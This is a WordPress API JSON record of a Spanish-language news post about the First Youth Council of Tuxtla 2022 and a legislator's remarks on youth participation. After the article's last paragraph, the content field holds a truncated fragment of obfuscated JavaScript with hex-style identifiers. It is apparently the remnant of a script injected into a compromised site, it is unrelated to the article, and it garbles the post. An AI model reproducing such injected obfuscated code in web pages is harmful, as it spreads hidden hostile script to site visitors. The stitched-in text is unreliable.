{"id":4334,"date":"2022-08-12T01:38:22","date_gmt":"2022-08-12T01:38:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4334"},"modified":"2022-08-12T01:38:23","modified_gmt":"2022-08-12T01:38:23","slug":"flor-esponda-impulsa-primer-cabildo-juvenil-tuxtla-2022","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4334","title":{"rendered":"Flor Esponda impulsa Primer Cabildo Juvenil Tuxtla 2022"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220811-WA0031.jpg\" alt=\"\" class=\"wp-image-4335\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220811-WA0031.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220811-WA0031-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220811-WA0031-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220811-WA0031-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez Chiapas a 11 de agosto de 2022.- Dentro del marco de las actividades por la \u201cSemana de las Juventudes\u201d, se llev\u00f3 a cabo el Primer Cabildo Juvenil Tuxtla 2022, donde estuvo presente la Diputada Flor de Mar\u00eda Esponda Torres.&nbsp;<\/p>\n\n\n\n<p>Dicho evento fue organizado por el Instituto Municipal de la Juventud y el Emprendimiento Tuxtla, y a su vez encabezado por el Presidente Municipal, Carlos Morales V\u00e1zquez.<\/p>\n\n\n\n<p>\u201cMe siento muy contenta que hoy la voz de los j\u00f3venes est\u00e9 presente m\u00e1s que nunca. Hoy estamos escuchando propuestas, pol\u00edticas p\u00fablicas, reformas y mejoras que nacen desde las inquietudes de las juventudes, con toda la fortaleza de seguir transformando nuestra capital Tuxtla Guti\u00e9rrez y nuestro estado de Chiapas&#8221;.&nbsp;<\/p>\n\n\n\n<p>Celebro este espacio de di\u00e1logo y escucha, y felicito a Gonzalo Solis director del INJUVEMP por la realizaci\u00f3n de este proyecto y desde luego reconocer el amplio respaldo de nuestro Presidente Municipal Carlos Morales V\u00e1zquez, ambos preocupados porque los j\u00f3venes nos involucremos cada d\u00eda m\u00e1s en la vida p\u00fablica y pol\u00edtica de nuestra sociedad\u201d, puntualiz\u00f3 la legisladora Flor Esponda.<\/p>\n\n\n\n<p>En este Cabildo Juvenil participaron 12 j\u00f3venes con propuestas de pol\u00edticas p\u00fablicas innovadoras, promoviendo as\u00ed mejoras para la Ciudad Capital Tuxtla Gutierrez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez Chiapas a 11 de agosto de 2022.- Dentro del marco de las actividades por la \u201cSemana de las Juventudes\u201d, se llev\u00f3 a cabo el Primer Cabildo Juvenil Tuxtla 2022, donde estuvo presente la Diputada Flor de Mar\u00eda Esponda Torres.&nbsp; Dicho evento fue organizado por el Instituto Municipal de la Juventud y el Emprendimiento &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4335,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4334","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4334","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4334"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4334\/revisions"}],"predecessor-version":[{"id":4336,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4334\/revisions\/4336"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4335"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4334"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4334"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4334"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}